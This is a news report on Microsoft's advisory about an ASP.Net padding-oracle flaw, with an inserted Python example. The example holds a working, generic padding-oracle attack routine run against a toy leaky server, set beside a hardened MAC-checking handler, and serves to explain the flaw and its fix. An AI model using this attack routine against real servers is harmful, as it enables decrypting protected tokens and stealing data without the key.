Microsoft confirms ASP.Net vulnerability

The company has warned that the framework's encryption system leaks cryptographic information through its error codes, although it says no actual exploit has been observed
Written by Jack Clark, Contributor

Microsoft has disclosed a major security vulnerability within ASP.Net, which affects all versions of the web-application framework.

On Friday Microsoft issued a security advisory saying that a vulnerability had been discovered in ASP.Net that could allow attackers to recover the plaintext of data the framework has encrypted and to read files from servers running the software.

"We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time," Microsoft wrote.

However, Microsoft recommends "that all customers immediately apply a workaround to prevent attackers from using this vulnerability against... ASP.Net applications", Scott Guthrie, a corporate vice president in Microsoft's developer division, wrote on his blog. Guthrie's blog details the workaround, which configures the application to return one generic error page for every failure, so that an attacker can no longer tell a decryption error apart from any other error.

The vulnerability lies in how ASP.Net reports errors when it decrypts data. An attacker can repeatedly send modified ciphertext to a web server and analyse the error responses it returns, eventually learning enough from those responses to decipher the text without ever knowing the key (a padding oracle attack). Once an attacker achieves this, they can request and download files within the ASP.Net application and decrypt information sent through the application.
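The attack described above in runnable form, as an added example that is not code from Microsoft or from this article: a server that decrypts a CBC-encrypted token and answers a padding failure with its own error message, an attacker that recovers the plaintext one byte at a time from that difference alone, and a hardened handler that authenticates the token before decrypting and answers every failure identically. The block cipher is a toy Feistel network built on SHA-256 standing in for AES, and the token layout, the class and function names, the response strings and the sample secret are all assumptions of the example; the attack itself depends only on CBC chaining and PKCS#7 padding.

```python
# Added example, not Microsoft's code: CBC padding-oracle attack on a token handler that leaks
# padding failures, beside a hardened handler. The toy Feistel cipher on SHA-256 stands in for AES.
import hashlib
import hmac
import os

BLOCK = 16

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def block_encrypt(key, blk):  # toy 4-round Feistel network; the attack does not depend on the cipher
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, xor(l, hashlib.sha256(key + bytes([i]) + r).digest()[:8])
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = xor(r, hashlib.sha256(key + bytes([i]) + l).digest()[:8]), l
    return l + r

def pad(data):  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, pt):
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, xor(pt[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    chain = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(xor(block_decrypt(key, c), p) for p, c in zip(chain, chain[1:]))

class LeakyServer:
    """Decrypts unauthenticated tokens; a padding failure gets its own error message."""
    def __init__(self):
        self.key, self.mac_key = os.urandom(16), os.urandom(16)
    def issue(self, plaintext):
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self.key, iv, pad(plaintext))
    def handle(self, token):
        try:
            data = unpad(cbc_decrypt(self.key, token[:BLOCK], token[BLOCK:]))
        except ValueError:
            return "500 invalid padding"  # the oracle: distinguishable from every other outcome
        return "200 OK" if data.startswith(b"user=") else "404 not found"

class HardenedServer(LeakyServer):
    """Authenticates the token before decrypting and answers every failure identically."""
    def issue(self, plaintext):
        body = super().issue(plaintext)
        return body + hmac.new(self.mac_key, body, hashlib.sha256).digest()
    def handle(self, token):
        body, tag = token[:-32], token[-32:]
        if not hmac.compare_digest(hmac.new(self.mac_key, body, hashlib.sha256).digest(), tag):
            return "500 error"  # forged ciphertext never reaches the decryptor
        resp = super().handle(body)
        return "500 error" if resp.startswith("500") else resp  # one error page for everything

def padding_oracle_attack(oracle, token):
    """Recover the plaintext from oracle(forged) -> bool alone; None if no forged block is ever accepted."""
    blocks = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    plaintext = b""
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # block_decrypt(key, target), learned right to left
        for pos in range(BLOCK - 1, -1, -1):
            padv = BLOCK - pos
            forged = bytearray(BLOCK)
            forged[pos + 1:] = bytes(b ^ padv for b in inter[pos + 1:])  # known bytes decrypt to padv
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged) + target):
                    continue
                # Last byte: a hit may be a lucky 0x02 0x02 (or longer); flipping the byte to its left breaks that, not a real 0x01
                if pos == BLOCK - 1 and not oracle(
                        bytes(forged[:-2]) + bytes([forged[-2] ^ 0xFF, guess]) + target):
                    continue
                inter[pos] = guess ^ padv
                break
            else:
                return None
        plaintext += xor(bytes(inter), prev)
    return unpad(plaintext)

def attack(server, secret):  # issue a token for `secret`, then recover it from the server's responses alone
    return padding_oracle_attack(lambda t: not server.handle(t).startswith("500"), server.issue(secret))
```

Against LeakyServer, `attack` recovers the secret with at most 256 queries per byte, never seeing the key. Against HardenedServer every forged token gets the same "500 error" and `padding_oracle_attack` returns None. The uniform error response is what the workaround in Guthrie's post achieves; checking a MAC before decrypting removes the oracle rather than hiding it, which is why it is the durable fix.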

One example of an application that relies on ASP.Net and is affected by this vulnerability is enterprise collaboration platform SharePoint, according to Guthrie, who has been responding to queries on his blog.

Microsoft is working with its Microsoft Active Protections Program partners to gather information on the exploit, and will correct the root cause of the issue.
